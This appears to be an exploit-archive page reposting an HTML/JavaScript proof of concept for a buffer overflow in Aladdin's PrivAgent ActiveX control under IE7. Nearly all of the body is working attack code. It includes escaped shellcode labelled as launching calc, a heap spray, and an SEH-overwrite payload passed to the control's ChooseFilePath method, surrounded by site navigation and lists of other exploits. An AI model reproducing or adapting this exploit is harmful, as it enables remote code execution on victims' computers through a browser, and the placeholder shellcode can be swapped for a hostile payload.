首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Aladdin Knowledge Systems Ltd. Overflow 来源：vfocus.net 作者：Blake 发布时间：2013-10-16   <html> <title>Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow</title> <!-- Aladdin Knowledge Systems Lt.d PrivAgent ActiveX Control Overflow Vendor: Aladdin Knowledge Systems Version: activex2002 Tested on: Windows 2003 SP2 / IE 7 Download: ftp://ftp.aladdin.com//pub/privilege/activex2002.zip Author: Blake Original Discovery: shinnai   CLSID: 09F68A41-2FBE-11D3-8C9D-0008C7D901B6 Safe for Scripting: True Safe for Initialization: True --> <object classid='clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6' id='test'></object>   <script>        // heap spray for IE7     //calc - 196 bytes     var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');     var bigblock = unescape('%u9090%u9090');     var headersize = 20;     var slackspace = headersize + shellcode.length;     while (bigblock.length < slackspace) bigblock += bigblock;     var fillblock = bigblock.substring(0,slackspace);     var block = bigblock.substring(0,bigblock.length - slackspace);     while (block.length + slackspace < 0x40000) block = block + block + fillblock;     var memory = new Array();     for (i = 0; i < 250; i++){ memory[i] = block + shellcode }          buffer = "";     while(buffer.length < 1224) buffer+="A";     next_seh = "BBBB";     seh = "\x0a\x0a\x0a\x0a";   // heap address     junk = "";     while (junk.length < 1700) junk+="D";          var payload = buffer + next_seh + seh + junk;    test.ChooseFilePath(payload);   </script> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PDFCool Studio Buffer Overflow ·Persistent Payload In Windows ·Zabbix 2.0.8 SQL Injection / R ·Level One Enterprise Access Po ·HP Data Protector Cell Request ·SikaBoom - Remote Buffer Overf ·MS13-080 Microsoft Internet Ex ·ARRIS DG860A NVRAM Backup Comp ·Android Zygote Socket Vulnerab ·PHP Point Of Sale 10.x / 11.x ·Beetel Connection Manager SEH ·WebTester 5.x Command Executio   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved